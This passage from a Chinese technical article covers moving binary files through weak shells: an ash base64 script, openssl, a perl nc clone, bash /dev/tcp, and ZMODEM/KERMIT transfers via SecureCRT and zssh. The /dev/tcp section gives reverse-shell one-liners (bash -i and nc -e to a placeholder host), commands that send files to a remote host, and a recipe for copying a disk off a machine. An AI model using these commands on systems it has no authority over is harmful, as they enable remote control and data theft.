"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" echo -n -e "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf" echo -n -e "\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" echo -n -e "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef" echo -n -e "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
3) base64.ash
base64编码时不直接处理binary,处理"xxd -p"、"od -An -tx1 -v --width=30"这 类输入,允许出现空格,只支持小写[a-f]。如果busybox没有提供od,base64.ash无 法进行base64编码。base64.ash不直接处理binary,主要因为busybox的ash不支持-d, 无法有效读取\n。
base64.ash进行base64解码时仅依赖busybox的ash,但效率极其低下。
!/bin/ash
Author : scz@nsfocus
: 2018-10-08
: 2018-10-16 16:12
base64encode () { base64table="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" hextable="0123456789abcdef" o=0 bits=0 n=0 maxn=76 count=0
while LANG=C IFS= read -r -n 1 byte
do
if [ "$byte" ] ; then
h=${hextable%${byte}*}
h=${#h}
if [[ $h != 16 ]] ; then
let count+=1
i=0
while [ $i -lt 4 ]
do
let o=o*2+h/8
let h=h*2%16
let bits+=1
if [[ $bits == 6 ]] ; then
printf ${base64table:$o:1}
let n+=1
if [ $n -ge $maxn ] ; then
printf "\n"
n=0
fi
o=0
bits=0
fi
let i+=1
done
fi
fi
done
if [[ $bits != 0 ]] ; then
while [ $bits -lt 6 ]
do
let bits+=1
let o*=2
done
printf ${base64table:$o:1}
let n+=1
if [ $n -ge $maxn ] ; then
printf "\n"
n=0
fi
fi
let count=count/2%3
if [[ $count != 0 ]] ; then
i=0
let t=3-count
while [ $i -lt $t ]
do
printf "="
let n+=1
if [ $n -ge $maxn ] ; then
printf "\n"
n=0
fi
let i+=1
done
fi
if [ $n -ne 0 ] ; then
printf "\n"
fi
}
base64decode () { base64table="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" o=0 bits=0
while LANG=C IFS= read -r -n 1 byte
do
if [ "$byte" ] ; then
c=${base64table%${byte}*}
c=${#c}
if [[ $c != 64 ]] ; then
b=0
while [ $b -lt 6 ]
do
let o=o*2+c/32
let c=c*2%64
let bits+=1
if [[ $bits == 8 ]] ; then
escseq=$(printf "\x%02x" $o)
printf $escseq
o=0
bits=0
fi
let b+=1
done
fi
fi
done
}
if [ "$1" != "-d" ] ; then base64encode else base64decode fi
$ echo -n -e "scz@nsfocus" | xxd -p | busybox ash base64.ash
$ busybox od -An -tx1 -v some | busybox ash base64.ash > some.txt $ busybox ash base64.ash -d < some.txt > some
☆ openssl
openssl可以进行base64编解码。一般不考虑目标环境存在openssl,列于此处只是出 于完备性考虑。
$ openssl enc -base64 -e -in some -out some.txt
some.txt形如:
AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4v MDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5f YGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6P kJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/ wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v 8PHy8/T19vf4+fr7/P3+/w==
$ openssl enc -base64 -d -in some.txt -out some $ base64 -d some.txt > some
"openssl enc -base64 -d"容错性不足,输入文件每行64个字符时无问题。如果 输入文件不是由"openssl enc -base64 -e"产生的,比如是一个单行超长字符串,此 时务必不要直接用"openssl enc -base64 -d"进行BASE64解码,会丢数据,除非手工 处理过输入文件,折过行。"base64 -d"无此问题。这是个坑,我碰上了。
☆ 小结
至此为止,前面介绍的都是bin与txt的相互转换,各种编码、解码。假设数据传输通 道只有一个弱shell,有回显,可以通过copy/paste无损传输可打印字符。为了将不 可打印字节传输过去,只能通过编解码进行数据映射。前文只演示了3种数据映射方 案,有更多其他编解码方案,但没必要,这3种够用了。
弱环境使得无法用C代码完成编解码,只能用一些受限的现有工具完成,为此上场了 各种奇技淫巧。
后面的内容是一些相关发散。
☆ perl
1) nc.pl
nc.pl实现nc部分功能。
!/usr/bin/perl
use IO::Socket;
$SIG{PIPE} = 'IGNORE'; $buflen = 102400;
die "Usage: $0
die "connect to $host:$port: $!\n" unless $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => $port, proto => 'tcp' );
while ( ( $count = sysread( STDIN, $buffer, $buflen ) ) > 0 ) { die "socket write error: $!\n" unless syswrite( $sock, $buffer, $count ) == $count; } die "socket read error: $!\n" if $count < 0; die "close socket: $!\n " unless close( $sock );
本文最初没打算把perl牵扯进来,一般有perl的环境都不算弱环境。事实上前面主要 考虑没有网络的串口登录shell,而且优先考虑恶劣的弱busybox环境。
后来想起曾经处理过一台x64/Solaris,当时需要取证,不允许在上面额外安装二进 制工具,系统中没有nc,但有perl解释器。虽然这个场景不够恶劣,也算有所限制。
$ dd if=/dev/dsk/cNtNdNs2 | nc.pl
用这个办法把硬盘dd走了。不记得当时是否有bash在场,若有,可以这样:
$ dd if=/dev/dsk/cNtNdNs2 | cat > /dev/tcp/
☆ /dev/tcp
参看bash(1)
/dev/fd/fd /proc/self/fd/fd
If fd is a valid integer, file descriptor fd is duplicated.
/dev/stdin
File descriptor 0 is duplicated.
/dev/stdout
File descriptor 1 is duplicated.
/dev/stderr
File descriptor 2 is duplicated.
/dev/tcp/host/port
If host is a valid hostname or Internet address, and port is an integer
port number or service name, bash attempts to open the corresponding
TCP socket.
/dev/udp/host/port
If host is a valid hostname or Internet address, and port is an integer
port number or service name, bash attempts to open the corresponding
UDP socket.
$ ls -l /dev/fd lrwxrwxrwx 1 root root 13 Oct 23 10:45 /dev/fd -> /proc/self/fd/ $ ls -l /dev/stdin lrwxrwxrwx 1 root root 15 Oct 23 10:45 /dev/stdin -> /proc/self/fd/0 $ ls -l /dev/stdout lrwxrwxrwx 1 root root 15 Oct 23 10:45 /dev/stdout -> /proc/self/fd/1 $ ls -l /dev/stderr lrwxrwxrwx 1 root root 15 Oct 23 10:45 /dev/stderr -> /proc/self/fd/2 $ ls -l /dev/tcp /dev/udp ls: cannot access '/dev/tcp': No such file or directory ls: cannot access '/dev/udp': No such file or directory
如果OS已经提供这些文件,bash将直接使用它们,否则bash会在内部模拟它们并使用 之。/dev/tcp、/dev/udp很可能并不真实存在,此时离开bash环境将无法使用它们, 比如busybox的ash就不支持它们。
bash支持/dev/tcp时只用到connect(2),没有用bind(2),因此只能主动连接,不能 被动侦听。若所在主机不允许主动外连,无法使用/dev/tcp。
1) 检查SSH banner
检查当前环境对/dev/tcp的支持,获取SSH banner:
$ cat < /dev/tcp/127.0.0.1/22 SSH-2.0-OpenSSH_7.8p1 Debian-1
2) 访问"www.microsoft.com"
$ exec 1314<> /dev/tcp/www.microsoft.com/80 $ ls -l /dev/fd/1314 lrwx------ 1 root root 64 Oct 24 12:39 /dev/fd/1314 -> 'socket:[54768]' $ echo -n -e "GET / HTTP/1.1\r\nHost: www.microsoft.com\r\n\r\n" >&1314 $ cat <&1314 HTTP/1.1 200 OK Server: Apache ETag: "6082151bd56ea922e1357f5896a90d0a:1425454794" Last-Modified: Wed, 04 Mar 2015 07:39:54 GMT Accept-Ranges: bytes Content-Length: 1020 Content-Type: text/html Date: Wed, 24 Oct 2018 04:39:24 GMT Connection: keep-alive
Your current User-Agent string appears to be from an automated process, if this is incorrect, please click this link:United States English Microsoft Homepage
$ ls -l /proc/self/fd/1314 lrwx------ 1 root root 64 Oct 24 12:39 /proc/self/fd/1314 -> 'socket:[54768]' $ exec 1314>&- $ ls -l /proc/self/fd/1314 ls: cannot access '/proc/self/fd/1314': No such file or directory
3) 从本机向远端传输文件
在本机
nc -l -p 7474 < some
在远端
cat < /dev/tcp/x.x.x.x/7474 > some nc -n x.x.x.x 7474 > some
4) 从远端向本机传输文件
在本机
nc -l -p 7474 > some
在远端
cat some > /dev/tcp/x.x.x.x/7474 dd if=some | cat > /dev/tcp/x.x.x.x/7474 nc -n x.x.x.x 7474 < some
exec 1314<> /dev/tcp/x.x.x.x/7474 ls -l /dev/fd/1314 cat some >&1314 exec 1314>&-
5) 开远程shell
在本机
nc -l -p 7474
将来在上述窗口输入命令、查看命令回显
在远端
bash -i > /dev/tcp/x.x.x.x/7474 0<&1 2>&1 nc -n x.x.x.x 7474 -e /bin/bash
☆ SecureCRT
这里介绍ZMODEM/YMODEM/XMODEM/KERMIT方案,某些场景用得上,包括U-Boot,但举 例时用了Windows和Linux。
1) 从Windows向Linux上传文件
1.1) ZMODEM(推荐)
在Linux中安装lrzsz包:
$ aptitude install lrzsz $ dpkg -L lrzsz | grep "/bin/" /usr/bin/rx /usr/bin/rb /usr/bin/sx /usr/bin/sb /usr/bin/sz /usr/bin/rz
假设在Windows中用SecureCRT SSH登录Linux,在Linux的当前shell中切换到用于存 放上传文件的目录,比如:
$ cd /tmp/modem/
在Windows中操作SecureCRT:
Transfer->Zmodem Upload List->选择多个待上传文件->Start Upload
之后在/tmp/modem中将出现被上传文件。
整个过程会在Linux中隐式执行rz:
$ rz
rz waiting to receive.
Starting zmodem transfer. Press Ctrl+C to cancel.
Transferring
第二种操作方式,SecureCRT SSH登录Linux,在Linux中切换目录,在Windows中用鼠 标拖放待上传文件到SecureCRT SSH会话窗口,此时会弹出一个小窗口,在其中选择 "Send Zmodem"。
第三种操作方式,SecureCRT SSH登录Linux,在Linux中切换目录,在Linux中执行rz 命令,在SecureCRT中弹出界面让你选择文件,确定后完成上传。
如果在Windows中用SecureCRT TELNET登录Linux,上述几种步骤均无法完成上传,在 Linux中会看到:
$ rz rz waiting to receive.**B0100000023be50
然后僵死在此。排查后发现是TELNET会话设置的问题:
Options->Session Options->Terminal->X/Y/Zmodem->Zmodem->Disable Zmodem
居然是禁用状态。启用后,SecureCRT TELNET会话亦可使用ZMODEM上传文件。
假设起点是A机,从A用SecureCRT SSH登到B,从B SSH登录到C,此时在A上可以用 ZMODEM直接上传文件到C。考虑B是跳板机的情形,以及sftp/scp因故不能时,这为某 些行动提供了便利。
1.2) YMODEM
相比ZMODEM,YMODEM、XMODEM没有优势,这里只是演示,并不推荐。
在Linux中执行:
$ rb -b
在Windows中操作SecureCRT:
Options->Session Options->Terminal->X/Y/Zmodem->X/Ymodem send packet size
128 bytes // 缺省值 1024 bytes (Xmodem-1k/Ymodem-1k) // 选这个
Transfer->Send Ymodem->选择文件
或者用鼠标拖放文件到相应SecureCRT会话窗口。YMODEM比ZMODEM慢,在Debian中居 然需要用Ctrl-C结束,不过不影响上传数据。
1.3) XMODEM(不推荐)
在Linux中执行:
$ rx -b some
rx一次只能接收一个文件。
在Windows中操作SecureCRT:
Options->Session Options->Terminal->X/Y/Zmodem->X/Ymodem send packet size->1024 bytes (Xmodem-1k/Ymodem-1k) Transfer->Send Xmodem->选择文件
待上传文件在Windows中的名字不要求是some,但到了Linux中将被重命名为some。在 Debian中同样可能需要用Ctrl-C结束,但不影响上传数据。
相比ZMODEM、YMODEM,XMODEM有个大问题,在man中写道:
Up to 1023 garbage characters may be added to the received file.
比如某文件正常尾部是:
000028b0: 20 72 65 76 65 72 74 0a 66 69 revert.fi
通过XMODEM上传后其尾部数据是:
000028b0: 20 72 65 76 65 72 74 0a 66 69 1a 1a 1a 1a 1a 1a revert.fi...... 000028c0: 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a ................ 000028d0: 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a ................ 000028e0: 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a ................ 000028f0: 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a ................
尾部填充导致不宜用XMODEM上传binary,尽管可以用dd切掉尾部填充。ZMODEM、 YMODEM无此问题。
1.4) KERMIT
介绍ZMODEM的文章很多,介绍KERMIT的较少,看到过标题说是介绍KERMIT内容实际是 ZMODEM的文章,真扯淡。
在Linux中安装ckermit包:
$ aptitude install ckermit $ dpkg -L ckermit | grep "/bin/" /usr/bin/kermit /usr/bin/kermit-sshsub /usr/bin/kermrc
在Linux中执行:
$ cd /tmp/kermit/ $ kermit -i -r
在Windows中操作SecureCRT: Transfer->Send Kermit->选择文件(可以多选)
或者用鼠标拖放文件到相应SecureCRT会话窗口,在弹出窗口中选择"Send Kermit"。
2) 从Linux向Windows下载文件
2.1) ZMODEM(推荐)
假设在Windows中用SecureCRT SSH登录Linux
在Windows中操作SecureCRT:
Options->Session Options->Terminal->X/Y/Zmodem->Directories->Download->指定用于存放下载文件的目录
不必理会Upload的设置
在Linux中执行:
$ sz -b zmodem.bin other.bin rz Starting zmodem transfer. Press Ctrl+C to cancel. Transferring zmodem.bin... ... Transferring other.bin... ...
在Windows中检查Download目录,已经出现被下载文件。
SecureCRT对sz的支持比较智能,没有想像中的:
Transfer->Receive Zmodem
这带来一些兼容性问题。某远程主机是一台嵌入式ARM/Linux,上面有个3.48版sz,
远程执行"sz -b
提供两个编译好的用于嵌入式ARM/Linux的静态链接版rz/sz:
https://scz.617.cn/unix/lrz https://scz.617.cn/unix/lsz
$ ls -l lrz lsz -rwxr-xr-x 1 root root 628268 Oct 19 15:07 src/lrz -rwxr-xr-x 1 root root 630340 Oct 19 15:07 src/lsz $ file -b lrz lsz ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.16, stripped ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.16, stripped $ md5sum lrz lsz d8938665ca3d6dffad2f98db41c85700 lrz 50b7d283f85c1634d69a97386dcb32cb lsz $ shasum lrz lsz c43e28f7f9d4a5cc1f7f303f5de7774eecd58a0a lrz 9e5c8cf17aedc9563bf89e84dcb3be4afa49b1ff lsz
设法将它们弄到设备中去,重命名成rz/sz,放到/bin/下,与SecureCRT合作无误。 如果知道自己在干啥,不重命也能完成上传、下载。
假设起点是A机,从A用SecureCRT SSH登到B,从B SSH登录到C,此时可以用ZMODEM直 接从C向A下载文件。考虑B是跳板机的情形,以及sftp/scp因故不能时,这为某些行 动提供了便利。
2.2) YMODEM
在Linux中执行:
$ sb -b -k ymodem.bin other.bin
在Windows中操作SecureCRT:
Options->Session Options->Terminal->X/Y/Zmodem->Directories->Download->指定用于存放下载文件的目录 Options->Session Options->Terminal->X/Y/Zmodem->X/Ymodem send packet size->1024 bytes (Xmodem-1k/Ymodem-1k) Transfer->Receive Ymodem
在Windows中检查Download目录,已经出现被下载文件。
2.3) XMODEM(不推荐)
在Linux中执行:
$ sx -b -k xmodem.bin
sx一次只能传送一个文件。
在Windows中操作SecureCRT:
Options->Session Options->Terminal->X/Y/Zmodem->Directories->Download->指定用于存放下载文件的目录 Options->Session Options->Terminal->X/Y/Zmodem->X/Ymodem send packet size->1024 bytes (Xmodem-1k/Ymodem-1k) Transfer->Receive Xmodem
与2.2小节不同,此处弹出文件对话框,让你选择输出目录,还可以指定输出文件名。
1.3小节提到的尾部填充(0x1a)并不是Linux版rx命令的独有表现,应该是XMODEM规范。 SecureCRT通过XMODEM接收文件时,同样会进行尾部填充。填充什么数据,填充多少 字节,可以看rx源码,我已经打定主意不用XMODEM,不深究。
2.4) KERMIT
在Linux中执行:
$ kermit -I -P -i -s kermit.bin other.bin
指定-P,否则文件下载到Windows后文件名变成全大写。
在Windows中操作SecureCRT:
Options->Session Options->Terminal->X/Y/Zmodem->Directories->Download->指定用于存放下载文件的目录 Transfer->Receive Kermit
在Windows中检查Download目录,已经出现被下载文件。SecureCRT没有单独为KERMIT 配置下载目录的地方,KERMIT与ZMODEM共用同一个下载目录。
3) 妖孽的Send ASCII/Recive ASCII/Send Binary
SecureCRT的Transfer菜单中出现:
Send ASCII Recive ASCII Send Binary
不知这三个的正规使用场景是啥?
假设Windows有如下文件:
$ xxd -g 1 ascii.txt 00000000: 65 63 68 6f 20 73 63 7a 40 6e 73 66 6f 63 75 73 echo scz@nsfocus
"Send ASCII"后,相当于在Linux的shell中执行:
$ echo scz@nsfocus scz@nsfocus
"Recive ASCII"效果类似于:
File->Log Session File->Raw Log Session
"Send Binary"可能是与U-Boot之类的东西合作使用。
☆ zssh
若A、B都是Linux,也可以用rz/sz上传下载,此时需要zssh。zssh是"Zmodem SSH" 的缩写,Debian有这个包,直接装就是。
$ apt-cache search zssh $ dpkg -L zssh | grep "/bin/" /usr/bin/zssh /usr/bin/ztelnet
man手册里有:
zssh is an interactive wrapper for ssh used to switch the ssh connection between the remote shell and file transfers. This is achieved by using another tty/pty pair between the user and the local ssh process to plug either the user's tty (remote shell mode) or another process (file transfer mode) on the ssh connection.
ztelnet behaves similarly to zssh, except telnet is used instead of ssh. It is equivalent to 'zssh -s "telnet -8 -E"'
$ zssh
登录后,在远程shell里执行:
$ sz zmodem.bin other.bin **B00000000000000
按下zssh的"escape squence",缺省是Ctrl-@(或Ctrl-2)。这将进入另一个提示符, 在其中输入rz
zssh > rz
即可完成下载。此处有坑,假设是在C中用SecureCRT远程登录A,该会话启用ZMODEM, 前述操作原始意图是从B向A提供文件,实际效果是从B向C提供文件;这种场景下,为 了达成原始意图,必须先禁用C与A之间的ZMODEM。
上传更简单,在"zssh >"提示符下执行sz:
zssh > sz zmodem.bin other.bin
上传时跟SecureCRT一样"智能",不需要在远程shell里显式执行rz来配合。
☆ minicom
minicom也有ZMODEM支持,不过我最近没有这种使用场景出现,以后出现了回来补这 一小节内容。
☆ 其他工具
1) ExtraPuTTY
http://www.extraputty.com/index.php http://www.extraputty.com/features/zmodem.html
某天TK给我这个链接,说ExtraPuTTY给PuTTY增加了对ZMODEM的支持,可以直接在终 端会话中上传文件。他惯常装作好心的样子给我推荐一些新鲜东西,实则指望我当小 白鼠。这款工具我未实测,留给过路的妖精们。